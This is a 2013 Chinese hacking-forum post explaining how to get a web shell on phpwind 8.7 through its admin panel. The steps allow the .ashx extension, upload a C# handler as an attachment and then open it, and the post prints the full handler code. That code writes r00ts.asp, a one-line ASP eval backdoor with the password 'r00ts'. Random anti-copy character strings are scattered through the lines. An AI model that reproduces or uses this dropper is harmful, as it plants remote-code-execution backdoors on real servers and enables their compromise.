找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1970|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
2 z  c! C5 Q; y1 e! {- d" J
0 h# f! J, b; d% [$ ^! v群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx8 I, r( Q5 p: J" J9 i9 k

5 J; M0 O  Y& a/ J发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
2 c* d* ]! n9 V9 B( @
' E4 O5 V6 M( ?! R' u& r) [然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx& P8 f7 ?9 ~/ g& l* S7 P% z9 P0 {
6 n9 f$ A5 P/ z; k. [& l
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
- ~& @. D/ @0 a ( _" Z2 u8 F$ w) \$ `: T7 ]
下面是代码:, @! @3 z. i2 Z, Z+ f* [3 R

6 w4 s+ j/ ^: U5 p" x1 t<%@ WebHandler Language="C#"Class="Handler" %>2 f, t5 ?0 B+ s1 y+ r' n
using System;
1 N$ F" K) W  [/ O  `using System.Web;
$ m  s: j+ ]. _" fusing System.IO;
) J: D" ~6 e+ T" N! Z5 }public class Handler : IHttpHandler {
, U* l- d" R9 g5 qpublic void ProcessRequest (HttpContext context) {( S' f9 \: n* l9 ]8 u3 D9 i
context.Response.ContentType = "text/plain";
4 R# b1 }$ o  |( o5 y2 i9 s; ^! [StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));- \- @8 M4 T" [( m2 I' L, |
file1.Write("<%eval request(\"r00ts\")%>");
1 P7 ]) p! h7 c$ }file1.Flush();& k& P2 C; x7 J, _3 R, F
file1.Close();# w) _/ E1 J, G+ c$ s, s. b0 F
}
) x  L; \/ W, Z, \public bool IsReusable {9 _% ~2 B4 y- \3 E8 R7 X- H
get {7 \3 h8 F8 R( a& ?8 `4 i
return false;
/ b, {! b- r$ o2 |. a  D; d}
, r' }' {  N; y/ U}
# o0 P2 G& P. J/ q- [+ O}! D% s3 v. a: D7 ]( M  G3 V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表